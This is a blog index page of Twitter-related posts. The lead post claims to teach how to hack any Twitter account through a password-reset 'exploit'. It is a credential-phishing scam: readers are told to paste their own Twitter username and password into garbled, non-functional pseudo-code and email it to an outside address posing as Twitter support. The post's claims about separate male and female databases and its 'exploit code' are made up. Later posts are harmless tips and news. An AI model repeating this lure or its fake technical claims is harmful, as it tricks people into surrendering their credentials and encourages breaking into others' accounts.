Make Money

Freelance Jobs Freelance Jobs
Showing posts with label twitter. Show all posts
Showing posts with label twitter. Show all posts

20.12.11

Learn How To Hack Any Twitter Account Using A Web Based Exploit

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Do you want to learn how to hack twitter?, Are you looking for a way to hack your friends twitter account without them fiding out? Interested in finding out ways to hack someones profile? Maybe you want to take a quick peek at their direct message inbox, steal their username or find a glitch to use a hacking script.In this article I will show you a fairly easy step by step guide on how to hack twitter user accounts without having to directly hack into twitter or their computer and risk getting caught...ignore all those hacking services, twitter hacks and hackers that charge you money for something you can do on your own for free...hack the password of any of your friends accounts and get their password even as a prank or joke.

Hack twitter, hacking twitter passwords from user accounts and find out someones twitter password...Is any of it really possible? Yes it is!. Surely you've heard on the news of how President Obama's twitter got hacked or a few other celebrities. It is all due to twitter's poor coding/programming which causes all those errors like THIS POPULAR ONE.

A couple of month's ago I wanted to check my old Twitter account but forgot what email and password I had used to sign up, I sent an email to their technical support but they didn't reply so I decided to put my geek skills to good use and find a way to get my login information back by writing a twitter account hacking code or exploit as they are called.

HOW HACKING TWITTER ACCOUNTS WORKS
Twitter has two databases (one for males and one for females users) where they keep all the information from their users, if you remember the email you use to login but forget your password, you can use the 'Forgot your password?' option, however if like me you don't have any of that information it's impossible to legally recover that account.

If you know anything about programming websites you know the 'Forgot your password?' service has to be in direct contact with the databases in order to send requests to retrieve the forgotten information for you, basically what that means is if you 'ask' the database for the login information with the right 'code' (in our case exploit), it will send you back that information.

So all I had to figure out is what the code was and what system they used to contact the databases through the 'Forgot your password?' service, after a few weeks of writing and testing codes I came up with the right one for the job and after doing a bit of research I learned Twitter uses something similar to an email service to contact their databases.

But as usual, everything isn't as easy as it seems. For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you a verification link to your email when creating your account or changing your password), luckily for us Twitter is so poorly programmed they also allow you to use a friends/followers account to verify your own (it's a glitch in the "Mutual Friends/Followers" service where they authenticate accounts by checking if the associated friends/followers email is related to the 'victims' account), in other words, if the person you want to get the login information from is following you on Twitter and your following them...you can use your own account to verify theirs (by confusing the database into thinking we are checking if you both mutually follow each other rather than the true act of reseting their password and getting them to send it to us) and get their login email and password sent to you...but the victim must be following you and you them.
HOW TO DO IT

1) First off you will need to get your username and the victims username, how do you do this?

Go to the victims twitter profile and look at your browsers address bar, at the end of all the address you should see something like this: (I have used a red arrow to point it out)



Write it down somewhere as you will need to use it a bit further down, once that is done you may continue to step 2.
2) At the bottom of this page I have pasted the exploit code I created to fool the databases, this is the tricky part as you will have to edit the code a bit yourself so that it fits your needs when searching for the victims login information.

Scroll down to the bottom of this page and find the code I have highlighted in gray so you know what to copy, select the code and copy it to your clipboard (press CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit it.
3) Once you have the code somewhere you can edit it, you will need to insert three things into it, the twitter username of the victim and the friend authentication login information. I will give you step by step examples by trying the exploit code of my friend Sarah's account as the victim, see what parts you have to edit and with what:



1. Should be the victims username.
2. Should be your twitter login username to verify your the victims follower/friend.
3. Should be your password so the database can authentic you really are mutually following each other with the victim.

When editing the code, don't accidentally delete one of the quotes (") or it won't work, so make sure you put the information inside them.
4) Now that you have the exploit code edited and ready to send, we are all set to send it to the database through an email, since it's not your regular email but an exploit email we will have to use a special Subject so the database knows how to read it in programming language.

Go to your email address and Compose a new email to twittersupport@techie.com which is twitters customer service email for forgotten passwords, in the Subject copy and paste the code below highlighted in gray:

$[search_database = $find user+id= "VICTIMSUSERNAME", '%verification+user+gender' = }"F"{ begin_search();


Once you have edited the Subject and entered the email address, your Composed email should look like the screenshot below, I will numerate each item:



1. The email address of the twitter database's forgotten password customer service.
2. This is where you insert the victims username.
3. This is where you insert the victims gender (as mentioned above the twitter database is devided in a male section and female), put an M inside the quotes if they are a male or a F if they are a female.
5) After you have correctly written the To: and Subject: sections, you may proceed to insert the exploit code you previously edited in step 3 into the body section of the email. Now all you have to do is click Send and wait for the database to send you back it's reply with the information.

It should take from 12-24 hours depending on the traffic twitter has that day, this is a sample of the email response you'll receive:


THE EXPLOIT CODE
twt_select_db("find", $linkID) or die(twt_database_error()); $resultID = twt_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(twt_database_error()); $num_rows = db_num_rows($resultID); $row = twitter_fetch_array($resultID); $user_id = $row[0];

if ($user_id == "PUT_USERNAME_HERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that Username.
}
else {
// print "We're sorry, your follower does not appear to be in our database."

$passwordfromdb = $row[0];
$find userID = (%follower_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "YOUR_USERNAME_HERE"; (%follower_vulnerability_match%)
#user password = "YOURPASSWORDHERE"; (%follower_vulnerability_matchk%)
$follower_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email

session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {

}
elseif (empty($email_address)) {
   echo $empty_fields_message;
function decrypt userID password() {
     $salt = "abchefghjkmnpqrstuvwxyz0123456789";
     srand((double)microtime()*1000000);
     $i = 0;
     while ($i <= 7) {
             $num = decrypt() % 33;
             $tmp = substr($salt, $num, 1);
             $pass = $pass . $tmp;
             $i++;
    }
    return $pass;
  }

mail($email_address, $subject, $message, "Twitter Password Reset Confirmation


}
/end$


4.12.11

How to Hack Twitter

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Twitter is an online social networking site where friends have the option of staying in touch via mobile phones. When a user sends in a mobile text, Twitter sends the message out to friends and posts the text on your personal Twitter web page using a short code. Computer savvy Twitter users tweak the programming allowing others to use hacks for specialized features in Twitter.

Share photos and video through Twitter with the Twixxer hack where users upload images and receive a short URL, which links to a large version of the photo. Friends with the Twixxer hack are able to see a thumbnail before going to the larger image.
    • Share photos and video through Twitter with the Twixxer hack where users upload images and receive a short URL, which links to a large version of the photo. Friends with the Twixxer hack are able to see a thumbnail before going to the larger image.
    • Exchange files with friends in the Mac-based Twitter hack, Twittershare. Send HTML files with embedded video and stop using archaic FTP.
    • Monitor traffic patterns with the useful Commuter Feed Twitter hack. This social hack lets commuters share information on local traffic conditions by contacting a bot with message updates.
    • Show your Twitter updates (tweets) on your Wordpress blog with a plugin hack called MyTwitter.
    • Use the hack, Tweet What You Eat, to keep track of your eating habits and lose weight. Become friends with "TWYE" in Twitter, then send messages with food items you consume. Tweet What You Eat compiles your messages in a daily food diary.

2.12.11

5 Incredible Twitter Applications for Firefox

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed



Firefox is a free and open source web browser descended from the Mozilla Application Suite and managed by Mozilla Corporation. Firefox is the worlds’ most widely used and popular web browser. Similarly Twitter is also gaining popularity day by day. Twitter Application for the Firefox has added manifold benefits for the businesses, bloggers, netizens etc.
Twitter Applications for Firefox enhance promptness, diligence and other features in the form of toolbar, add-ons, plug-ins, widgets etc. All these make usage of Twitter a more diversified experience on Firefox web browser.
5 Incredible Twitter Applications for Firefox

1. Lu.ly

Lu.ly is a free browser toolbar for Firefox as well as Internet Explorer and Safari which brings Twitter and Facebook directly into your browser. Lu.ly fetches you real time tweets, shorten and post URLs of the site you visit in your browser. Lu.ly lets you perform all Twitter routine task like reply, send tweets, send messages privately, view new tweets and updates of Facebook and as well as update your Facebook status. You even can use search bar to search Twitter.


Twitter Line is now Tweet Line. Tweet Line, is another fabulous add-on for Firefox that displays Twitter time line on the toolbar similar to headlines. The’ Update Panel’ makes it possible to update Twitter timeline even when you are on other page. You can share URL of the current page, add tweets to favourites with a click, and send @Replies, retweet, multiple account management. Tweet Line can let you show and hide updates in the browser toolbar and it is assisted by Toggle button provided by the add-on.


GetGlue is another browser plug-in to recommend and share opinion and information pertaining to movies, books, restaurants, TV shows, music etc with the people who share same interest with friends on Twitter and Facebook and even on web. GetGlue helps in making notion through discussions and recommendations to select book stores, restaurant, and movie to visit and buy their things of interest. GetGlue is a perfect Firefox Plug-in to enjoy your leisure time smartly and connect to Twitter and Facebook to share information with your friends. You can write review, your opinion etc and share it.


Echofon is an easy to use Twitter client which works on multi platforms like Firefox, iPhone and Mac. Echofon is successor to TwitterFox and TwitterFon. Echofon lets you check friends’ replies, messages, view favourites, send and reply tweets. This app lets you search tweets, updating location, tweet syncing etc.


PowerTwitter is another useful plug-in for Firefox that really makes Twitter more thrilling and fun. PowerTwitter offers salient features on Firefox. View photos and videos of friends in thumbnail pattern instead of text links. Expand and shorten URLs. PowerTwitter lets you post photos as you get the benefit of uploading form various photo sharing sites like Twitpic, Twitgoo, and YFrog etc. This app lets you to visit Twitter pages of their friends and click on ‘Add to Top’ and get their friends added to the Top Friend option. You can keep yourself updated from YouTube, Flicker from PowerTwitter. You even get features like search, track, and answer-question to name some.
These Twitter Applications for Firefox are sure going to make your networking a new experience.
Share your experience with us via your comments!


1.12.11

140 Character Limit of Twitter Hacked

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Twitter’s 140 character limit has been hacked. Twitter customers were stunned when they saw that people have managed to write over nine hundred characters in a tweet when they know that the maximum limit is 140.
Stack Exchange has posted that this strange message contained backlashes and a bunch of numbers. The message was posted in Russian. It contained Unicode surrogate points that were not properly encoded as UTF-8. The CESU -8 encoding utilized in the tweet is accepted by some Twitter interfaces but for display purposes as the social network expects valid UTF-8 sequences. Each surrogate code point ends up being displayed with twelve characters since three bytes on each of these sequences are displayed as 3 C style octal escape sequences of 4 characters each.
Some technicians feel that it is possible since each group of characters that begins with a backlash represents an escape sequence which is considered as a valid character constant. Some of the escape sequences available are control characters. These characters tell the computer to move the cursor to move left or right or delete the characters to the left maybe. They can be used quite effectively to confuse Twitter.

28.11.11

Get free Facebook Likes, Google Plus, YouTube Views, Twitter Followers

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed



Unlimited   free Facebook Likes, Google Plus, YouTube Views, Twitter Followers and More

10 Expert Tips to Increase Twitter Followers

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Today Twitter is considered one of the most powerful internet marketing tools. If your ultimate goal is to increase your web presence/boosting your online sales, then you just can not ignore Twitter. And to be powerful influential in twitter you have to have lots of twitter followers. So if you are one of those serious one, trying everything only to increase twitter followers; then you are at right place. You will get 10 latest and effective tips to increase your twitter followers within a flash.

27.11.11

How To Download Full Background Image of a Twitter Profile

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

As you are aware that you can put a custom image as a background picture on your twitter profile. In past few months, lot many celebrities joined twitter and they are showing off their latest pictures as their twitter background. For example, recently joined Bollywood star Hrithik Roshan added his picture showing six-pack abs or the very familiar blue background used on Barack Obama’s twitter profile. If you want to download the picture to use that as your desktop wallpaper then you can do this by using very simple trick. 

24.11.11

Twitter SEO: How to Use Twitter to Get Higher Rankings?

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

There was a time when Twitter wasn't a popular form of social media. Quite a few people would have had a Twitter account prior to it being popular, and perhaps never used it. Its popularity these days as a form of social media has seen more users than ever before jump on the Twitter bandwagon.

Twitter is excellent because it allows you to give short and sharp pieces of information to potential customers. In this day and age, when our attention spans are extremely short when it comes to looking at things on the Internet, Twitter is perfect, and whether you are new to Twitter or a seasoned pro, there are plenty of benefits to be had for your business.



Get More Twitter followers and Facebook fans using Online Tools

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed

Social networking has become one of the best methods of building a strong customer and fan base and has proven to be one of the strongest online marketing methods. The latest sensations among the social networking sites are Facebook and Twitter which help online marketers take their products to customers.


Twitter Followers
Even though there are many marketing methods of increasing the number of followers in Twitter and Facebook, you can use some online tools for the purpose. Here are a few online tools that are available for better social networking.

18.11.11

Goggle Adsense joins Twitter

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed



Google Adsense Team joins Twitter. Now they have their own twitter account where they are tweeting all about Adsense.
So Adsense members Get ready to learn about how you can earn more bucks using adsense
on your vey own twitter account.
Till now, they have only 8 updates and more than 2000 followers.
The idea behind this is to alert publishers when there are any issues or update.
It’s clearly visible with their updates, that they are also trying to help publisher in getting more out of Adsense.

How to Backup Twitter Account? – Download your Tweets & Followers

Delicious Digg StumbleUpon Reddit Subscribe to RSS Feed




We have already seen how you can backup your facebook account by following simple steps. Now its time to backup your Twitter Account. Though Twitter has not yet launched its official backup service there are many 3rd party websites that will help you download your twitter account. None of us would like to lose all the tweets and followers, in case your account gets deleted, so it is better to take backup of your tweets and followers. Below i have Listed 2 such 3rd party web tools that will help you to download your Twitter account efficiently for Free.

 

HOW TO HACK Copyright © 2010 LKart Theme is Designed by Lasantha